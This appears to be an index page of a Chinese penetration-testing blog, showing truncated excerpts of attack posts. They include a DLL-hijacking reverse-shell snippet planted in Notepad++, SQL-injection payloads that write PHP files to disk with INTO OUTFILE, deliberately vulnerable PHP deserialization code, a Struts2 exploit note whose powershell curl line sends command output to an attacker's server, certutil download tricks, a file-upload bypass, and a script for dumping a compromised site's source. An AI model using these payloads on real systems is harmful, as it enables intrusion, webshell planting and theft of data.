在dll劫持中使用挺不错的,之前放在nopad++中,成功反弹。
代码如下:
LPCSTR szMyUniqueNamedEvent = "sysnullevt";
HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent);
switch (GetLastError())
{
// app is already running
case ERROR_ALREADY_EXISTS:
{
CloseHandle(m_hEvent);
bre...阅读全文>>
1.
select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php'
2.
select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E--
此写法需要查询出数据,才能...阅读全文>>
存在反序列漏洞的php代码
<html>
<head>
<title>WEB</title>
</head>
<body>
<?php
class Readflag{
var $file;
function __destruct(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
}
function __wakeup(){
if($this->fi...阅读全文>>
网上已经有很多复现过程了,这里就做个笔记
vps上执行:
python -m SimpleHTTPServer 8080
然后执行命令powershell "curl http://ip:port/index.php?whoami=$(whoami)"
powershell支持curl(测试机win7powershell不支持curl,未测)
POST /struts2-rest-showcase/orders/4 HTTP/1.1
Host: 192.168.1.212
User-Agen...阅读全文>>
0x00 前言
最近在Casey Smith @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验,介绍certutil在渗透测试中的应用,对cmd下downloader的实现方法作补充,总结base64编码转换的常用方法。
学习地址:
https://twitter.com/subTee/status/888101536475344896
https://twitter.com/subTee/status/888071631528235010
0x01 简介
本文...阅读全文>>
如何上传文件请移步:http://www.webbaozi.com/dmsj/18.html
这里就不多讲了
window特性:
双引号(""") <==> 点号(".")';
大于符号(">") <==> 问号("?")';
小于符号("<") <==> 星号("*")';
进入正题:
index.php
?m=editor
&f=edit
&filePath=YWFh
&action=override
&isExtends...阅读全文>>
打包网站源码使用,当不能执行命令时,有些大马由于写法问题,导致不能一次下载所有源码,所以从网上摘抄了代码做了下简单的修改。
代码如下:
<?php
//获取文件列表
function list_dir($dir){
$result = array();
if (is_dir($dir)){
$file_dir = scandir($dir);
foreach($file_dir as $file){
if ($file == '.' || $file == '..'){
...阅读全文>>
